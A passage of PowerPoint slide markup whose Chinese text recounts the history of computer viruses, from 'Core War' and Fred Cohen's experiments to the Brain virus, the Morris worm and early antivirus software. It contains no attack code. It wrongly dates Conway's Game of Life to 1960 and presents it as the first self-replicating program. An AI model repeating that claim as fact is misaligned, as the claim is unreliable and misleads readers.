            </a:r>
            <a:endParaRPr lang="zh-CN" altLang="en-US" sz="1200" b="0" i="0" dirty="0">
              <a:solidFill>
                <a:srgbClr val="222222"/>
              </a:solidFill>
              <a:effectLst/>
              <a:latin typeface="arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:endParaRPr lang="en-US" altLang="zh-CN" b="1" dirty="0">
              <a:sym typeface="+mn-ea"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:endParaRPr lang="en-US" altLang="zh-CN" b="1" dirty="0">
              <a:sym typeface="+mn-ea"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:endParaRPr lang="en-US" altLang="zh-CN" b="1" dirty="0">
              <a:sym typeface="+mn-ea"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:endParaRPr lang="en-US" altLang="zh-CN" b="1" dirty="0">
              <a:sym typeface="+mn-ea"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:endParaRPr lang="zh-CN" altLang="en-US" b="1" dirty="0"/>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r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="accent2"/>
                </a:solidFill>
                <a:sym typeface="+mn-ea"/>
              </a:rPr>
              <a:t>事件</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="accent2"/>
                </a:solidFill>
                <a:sym typeface="+mn-ea"/>
              </a:rPr>
              <a:t>1</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="accent2"/>
                </a:solidFill>
                <a:sym typeface="+mn-ea"/>
              </a:rPr>
              <a:t>：</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0">
                <a:sym typeface="+mn-ea"/>
              </a:rPr>
              <a:t>1960</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0">
                <a:sym typeface="+mn-ea"/>
              </a:rPr>
              <a:t>年，美国的约翰</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0">
                <a:latin typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                <a:sym typeface="+mn-ea"/>
              </a:rPr>
              <a:t>·</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0">
                <a:sym typeface="+mn-ea"/>
              </a:rPr>
              <a:t>康维编写了一个称为</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0">
                <a:latin typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                <a:sym typeface="+mn-ea"/>
              </a:rPr>
              <a:t>“</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0">
                <a:sym typeface="+mn-ea"/>
              </a:rPr>
              <a:t>生命游戏</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0">
                <a:latin typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                <a:sym typeface="+mn-ea"/>
              </a:rPr>
              <a:t>”</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0">
                <a:sym typeface="+mn-ea"/>
              </a:rPr>
              <a:t>程序，他的游戏程序运行时，在屏幕上会生成许多</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0">
                <a:latin typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                <a:sym typeface="+mn-ea"/>
              </a:rPr>
              <a:t>“</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0">
                <a:sym typeface="+mn-ea"/>
              </a:rPr>
              <a:t>生命元素</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0">
                <a:latin typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                <a:sym typeface="+mn-ea"/>
              </a:rPr>
              <a:t>”</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0">
                <a:sym typeface="+mn-ea"/>
              </a:rPr>
              <a:t>图案。这些元素图案会不断地发展变化。这个游戏首次实现了程序自我复制技术，它们能够自我复制并进行传播。 </a:t>
            </a:r>
            <a:endParaRPr lang="zh-CN" altLang="en-US" dirty="0"/>
          </a:p>
          <a:p>
            <a:pPr eaLnBrk="1" hangingPunct="1"/>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="accent2"/>
                </a:solidFill>
                <a:sym typeface="+mn-ea"/>
              </a:rPr>
              <a:t>事件</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="accent2"/>
                </a:solidFill>
                <a:sym typeface="+mn-ea"/>
              </a:rPr>
              <a:t>2</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="accent2"/>
                </a:solidFill>
                <a:sym typeface="+mn-ea"/>
              </a:rPr>
              <a:t>：</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0">
                <a:sym typeface="+mn-ea"/>
              </a:rPr>
              <a:t>贝尔实验室的三个年轻程序员道格拉斯</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0">
                <a:latin typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                <a:sym typeface="+mn-ea"/>
              </a:rPr>
              <a:t>·</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0">
                <a:sym typeface="+mn-ea"/>
              </a:rPr>
              <a:t>麦耀莱、维特</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0">
                <a:latin typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                <a:sym typeface="+mn-ea"/>
              </a:rPr>
              <a:t>·</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0">
                <a:sym typeface="+mn-ea"/>
              </a:rPr>
              <a:t>维索斯基和罗伯</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0">
                <a:latin typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                <a:sym typeface="+mn-ea"/>
              </a:rPr>
              <a:t>·</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0">
                <a:sym typeface="+mn-ea"/>
              </a:rPr>
              <a:t>莫里斯为打发工作之余的时间，发明了一种电子游戏叫</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0">
                <a:latin typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                <a:sym typeface="+mn-ea"/>
              </a:rPr>
              <a:t>“</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0">
                <a:sym typeface="+mn-ea"/>
              </a:rPr>
              <a:t>磁芯大战</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0">
                <a:latin typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                <a:sym typeface="+mn-ea"/>
              </a:rPr>
              <a:t>”</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0">
                <a:sym typeface="+mn-ea"/>
              </a:rPr>
              <a:t>。游戏规则是在预定的时间内，谁的程序繁殖得多，谁就得胜。</a:t>
            </a:r>
            <a:endParaRPr lang="zh-CN" altLang="en-US" dirty="0"/>
          </a:p>
          <a:p>
            <a:pPr eaLnBrk="1" hangingPunct="1">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0">
                <a:sym typeface="+mn-ea"/>
              </a:rPr>
              <a:t>     </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0">
                <a:latin typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                <a:sym typeface="+mn-ea"/>
              </a:rPr>
              <a:t>——</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0">
                <a:sym typeface="+mn-ea"/>
              </a:rPr>
              <a:t>这个游戏程序就是最早的计算机病毒的雏形。具备了自我复制、自我传播的性质和破坏性。  </a:t>
            </a:r>
            <a:endParaRPr lang="zh-CN" altLang="en-US" dirty="0"/>
          </a:p>
          <a:p>
            <a:endParaRPr lang="zh-CN" altLang="en-US"/>
          </a:p>
          <a:p>
            <a:pPr eaLnBrk="1" hangingPunct="1"/>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="accent2"/>
                </a:solidFill>
                <a:sym typeface="+mn-ea"/>
              </a:rPr>
              <a:t>真正的计算机病毒是在</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="accent2"/>
                </a:solidFill>
                <a:sym typeface="+mn-ea"/>
              </a:rPr>
              <a:t>1983</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="accent2"/>
                </a:solidFill>
                <a:sym typeface="+mn-ea"/>
              </a:rPr>
              <a:t>年的一次安全讨论会上提出来的。</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0">
                <a:sym typeface="+mn-ea"/>
              </a:rPr>
              <a:t>弗雷德</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0">
                <a:latin typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                <a:sym typeface="+mn-ea"/>
              </a:rPr>
              <a:t>·</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0">
                <a:sym typeface="+mn-ea"/>
              </a:rPr>
              <a:t>科恩博士研制出一种在运行过程中可以复制自身的破坏性程序，伦</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0">
                <a:latin typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                <a:sym typeface="+mn-ea"/>
              </a:rPr>
              <a:t>·</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0">
                <a:sym typeface="+mn-ea"/>
              </a:rPr>
              <a:t>艾德勒曼将它命名为</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="accent2"/>
                </a:solidFill>
                <a:sym typeface="+mn-ea"/>
              </a:rPr>
              <a:t>计算机病毒</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0">
                <a:sym typeface="+mn-ea"/>
              </a:rPr>
              <a:t>。专家们在</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0">
                <a:sym typeface="+mn-ea"/>
              </a:rPr>
              <a:t>VAX11/750</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0">
                <a:sym typeface="+mn-ea"/>
              </a:rPr>
              <a:t>计算机系统上运行第一个病毒试验成功，一周后又获准进行</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0">
                <a:sym typeface="+mn-ea"/>
              </a:rPr>
              <a:t>5</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0">
                <a:sym typeface="+mn-ea"/>
              </a:rPr>
              <a:t>个试验的演示，从而在实验室验证了计算机病毒的存在。 </a:t>
            </a:r>
            <a:endParaRPr lang="zh-CN" altLang="en-US" dirty="0"/>
          </a:p>
          <a:p>
            <a:pPr eaLnBrk="1" hangingPunct="1"/>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="accent2"/>
                </a:solidFill>
                <a:sym typeface="+mn-ea"/>
              </a:rPr>
              <a:t>1986</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="accent2"/>
                </a:solidFill>
                <a:sym typeface="+mn-ea"/>
              </a:rPr>
              <a:t>年，</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0">
                <a:sym typeface="+mn-ea"/>
              </a:rPr>
              <a:t>巴基斯坦的两兄弟拉合尔</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0">
                <a:latin typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                <a:sym typeface="+mn-ea"/>
              </a:rPr>
              <a:t>·</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0">
                <a:sym typeface="+mn-ea"/>
              </a:rPr>
              <a:t>巴锡特和阿姆杰德，他们常编写一些应用程序并为盗版而烦恼。为了打击那些盗版软件的使用者，他们设计了一个名为</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="accent2"/>
                </a:solidFill>
                <a:latin typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                <a:sym typeface="+mn-ea"/>
              </a:rPr>
              <a:t>“</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="accent2"/>
                </a:solidFill>
                <a:sym typeface="+mn-ea"/>
              </a:rPr>
              <a:t>巴基斯坦智囊</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="accent2"/>
                </a:solidFill>
                <a:latin typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                <a:sym typeface="+mn-ea"/>
              </a:rPr>
              <a:t>”</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0">
                <a:sym typeface="+mn-ea"/>
              </a:rPr>
              <a:t>的病毒，该病毒只传染软盘引导。这就是最早在世界上流行的一个真正的病毒。 </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr eaLnBrk="1" hangingPunct="1"/>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0">
                <a:sym typeface="+mn-ea"/>
              </a:rPr>
              <a:t>1987</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0">
                <a:sym typeface="+mn-ea"/>
              </a:rPr>
              <a:t>年是病毒大量被发现的一年，大量的计算机病毒在这一年突然出现在全世界各地的计算机用户的计算机上，这些病毒即使今天人们也记忆犹新。</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="accent2"/>
                </a:solidFill>
                <a:sym typeface="+mn-ea"/>
              </a:rPr>
              <a:t>典型的如大麻、</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="accent2"/>
                </a:solidFill>
                <a:sym typeface="+mn-ea"/>
              </a:rPr>
              <a:t>IBM</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="accent2"/>
                </a:solidFill>
                <a:sym typeface="+mn-ea"/>
              </a:rPr>
              <a:t>圣诞树、黑色星期五等</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0">
                <a:sym typeface="+mn-ea"/>
              </a:rPr>
              <a:t>。 </a:t>
            </a:r>
            <a:endParaRPr lang="zh-CN" altLang="en-US" dirty="0"/>
          </a:p>
          <a:p>
            <a:pPr eaLnBrk="1" hangingPunct="1"/>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0">
                <a:sym typeface="+mn-ea"/>
              </a:rPr>
              <a:t>1988</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0">
                <a:sym typeface="+mn-ea"/>
              </a:rPr>
              <a:t>年</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0">
                <a:sym typeface="+mn-ea"/>
              </a:rPr>
              <a:t>3</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0">
                <a:sym typeface="+mn-ea"/>
              </a:rPr>
              <a:t>月</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0">
                <a:sym typeface="+mn-ea"/>
              </a:rPr>
              <a:t>2</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0">
                <a:sym typeface="+mn-ea"/>
              </a:rPr>
              <a:t>日，第一个在苹果机上的计算机病毒发作，这天受感染的苹果机停止工作，病毒并没有进行破坏，只是显示</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0">
                <a:latin typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                <a:sym typeface="+mn-ea"/>
              </a:rPr>
              <a:t>“</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0">
                <a:sym typeface="+mn-ea"/>
              </a:rPr>
              <a:t>向所有苹果计算机的使用者宣布和平的信息</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0">
                <a:latin typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                <a:sym typeface="+mn-ea"/>
              </a:rPr>
              <a:t>”</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0">
                <a:sym typeface="+mn-ea"/>
              </a:rPr>
              <a:t>，这一天是苹果机的生日。</a:t>
            </a:r>
            <a:endParaRPr lang="zh-CN" altLang="en-US" dirty="0"/>
          </a:p>
          <a:p>
            <a:endParaRPr lang="zh-CN" altLang="en-US"/>
          </a:p>
          <a:p>
            <a:pPr eaLnBrk="1" hangingPunct="1">
              <a:lnSpc>
                <a:spcPct val="80000"/>
              </a:lnSpc>
            </a:pPr>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0">
                <a:sym typeface="+mn-ea"/>
              </a:rPr>
              <a:t>计算机病毒首次真正造成大规模破坏是</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="accent2"/>
                </a:solidFill>
                <a:sym typeface="+mn-ea"/>
              </a:rPr>
              <a:t>1988</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="accent2"/>
                </a:solidFill>
                <a:sym typeface="+mn-ea"/>
              </a:rPr>
              <a:t>年</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="accent2"/>
                </a:solidFill>
                <a:sym typeface="+mn-ea"/>
              </a:rPr>
              <a:t>11</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="accent2"/>
                </a:solidFill>
                <a:sym typeface="+mn-ea"/>
              </a:rPr>
              <a:t>月</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="accent2"/>
                </a:solidFill>
                <a:sym typeface="+mn-ea"/>
              </a:rPr>
              <a:t>2</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="accent2"/>
                </a:solidFill>
                <a:sym typeface="+mn-ea"/>
              </a:rPr>
              <a:t>号。美国康乃尔大学</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="accent2"/>
                </a:solidFill>
                <a:sym typeface="+mn-ea"/>
              </a:rPr>
              <a:t>23</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="accent2"/>
                </a:solidFill>
                <a:sym typeface="+mn-ea"/>
              </a:rPr>
              <a:t>岁研究生罗伯特</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="accent2"/>
                </a:solidFill>
                <a:latin typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                <a:sym typeface="+mn-ea"/>
              </a:rPr>
              <a:t>·</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="accent2"/>
                </a:solidFill>
                <a:sym typeface="+mn-ea"/>
              </a:rPr>
              <a:t>莫里斯</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0">
                <a:sym typeface="+mn-ea"/>
              </a:rPr>
              <a:t>编写了一个蠕虫病毒，感染了网络中的</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0">
                <a:sym typeface="+mn-ea"/>
              </a:rPr>
              <a:t>6000</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0">
                <a:sym typeface="+mn-ea"/>
              </a:rPr>
              <a:t>多台计算机，并使其中的</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0">
                <a:sym typeface="+mn-ea"/>
              </a:rPr>
              <a:t>5000</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0">
                <a:sym typeface="+mn-ea"/>
              </a:rPr>
              <a:t>台计算机被迫停机数小时，导致的直接经济损失达</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0">
                <a:sym typeface="+mn-ea"/>
              </a:rPr>
              <a:t>9600</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0">
                <a:sym typeface="+mn-ea"/>
              </a:rPr>
              <a:t>万美元。</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0">
                <a:latin typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                <a:sym typeface="+mn-ea"/>
              </a:rPr>
              <a:t>——</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="FF0000"/>
                </a:solidFill>
                <a:sym typeface="+mn-ea"/>
              </a:rPr>
              <a:t>莫里斯事件</a:t>
            </a:r>
            <a:endParaRPr lang="zh-CN" altLang="en-US" dirty="0">
              <a:solidFill>
                <a:srgbClr val="FF0000"/>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr eaLnBrk="1" hangingPunct="1">
              <a:lnSpc>
                <a:spcPct val="80000"/>
              </a:lnSpc>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0">
                <a:sym typeface="+mn-ea"/>
              </a:rPr>
              <a:t>1990</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0">
                <a:sym typeface="+mn-ea"/>
              </a:rPr>
              <a:t>年</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0">
                <a:sym typeface="+mn-ea"/>
              </a:rPr>
              <a:t>1</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0">
                <a:sym typeface="+mn-ea"/>
              </a:rPr>
              <a:t>月发现首例隐藏型计算机病毒</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0">
                <a:latin typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                <a:sym typeface="+mn-ea"/>
              </a:rPr>
              <a:t>“</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0">
                <a:sym typeface="+mn-ea"/>
              </a:rPr>
              <a:t>4096</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0">
                <a:latin typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                <a:sym typeface="+mn-ea"/>
              </a:rPr>
              <a:t>”</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0">
                <a:sym typeface="+mn-ea"/>
              </a:rPr>
              <a:t>，它不仅攻击程序还破坏数据文件。</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0">
                <a:sym typeface="+mn-ea"/>
              </a:rPr>
              <a:t>1991</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0">
                <a:sym typeface="+mn-ea"/>
              </a:rPr>
              <a:t>年发现首例网络计算机病毒</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0">
                <a:latin typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                <a:sym typeface="+mn-ea"/>
              </a:rPr>
              <a:t>“</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0">
                <a:sym typeface="+mn-ea"/>
              </a:rPr>
              <a:t>GPI</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0">
                <a:latin typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                <a:sym typeface="+mn-ea"/>
              </a:rPr>
              <a:t>”</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0">
                <a:sym typeface="+mn-ea"/>
              </a:rPr>
              <a:t>，它突破了</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0">
                <a:sym typeface="+mn-ea"/>
              </a:rPr>
              <a:t>NOVELL</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0">
                <a:sym typeface="+mn-ea"/>
              </a:rPr>
              <a:t>公司的</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0">
                <a:sym typeface="+mn-ea"/>
              </a:rPr>
              <a:t>Netware</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0">
                <a:sym typeface="+mn-ea"/>
              </a:rPr>
              <a:t>网络安全机制。 </a:t>
            </a:r>
            <a:endParaRPr lang="zh-CN" altLang="en-US" dirty="0"/>
          </a:p>
          <a:p>
            <a:pPr eaLnBrk="1" hangingPunct="1">
              <a:lnSpc>
                <a:spcPct val="80000"/>
              </a:lnSpc>
            </a:pPr>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0">
                <a:sym typeface="+mn-ea"/>
              </a:rPr>
              <a:t>硬件防病毒卡成为当时反病毒市场的主流，国外的反病毒软件</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0">
                <a:sym typeface="+mn-ea"/>
              </a:rPr>
              <a:t>SCAN</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0">
                <a:sym typeface="+mn-ea"/>
              </a:rPr>
              <a:t>和</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0">
                <a:sym typeface="+mn-ea"/>
              </a:rPr>
              <a:t>TBAV</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0">
                <a:sym typeface="+mn-ea"/>
              </a:rPr>
              <a:t>等开始进入中国市场，国内计算机专业人员开始开发自己的杀病毒软件。病毒与反病毒双方的斗争开始进入白热化阶段。</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr eaLnBrk="1" hangingPunct="1">
              <a:lnSpc>
                <a:spcPct val="80000"/>
              </a:lnSpc>
            </a:pPr>
            <a:endParaRPr lang="zh-CN" altLang="en-US"/>
          </a:p>
          <a:p>
            <a:pPr eaLnBrk="1" hangingPunct="1">
              <a:lnSpc>
                <a:spcPct val="80000"/>
              </a:lnSpc>
            </a:pPr>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0">
                <a:sym typeface="+mn-ea"/>
              </a:rPr>
              <a:t>通过特征代码对病毒进行查杀是当时防病毒的技术主流。</a:t>
            </a:r>
            <a:endParaRPr lang="zh-CN" altLang="en-US" dirty="0"/>
          </a:p>
          <a:p>
            <a:pPr eaLnBrk="1" hangingPunct="1">
              <a:lnSpc>
                <a:spcPct val="80000"/>
              </a:lnSpc>
            </a:pPr>
            <a:r>
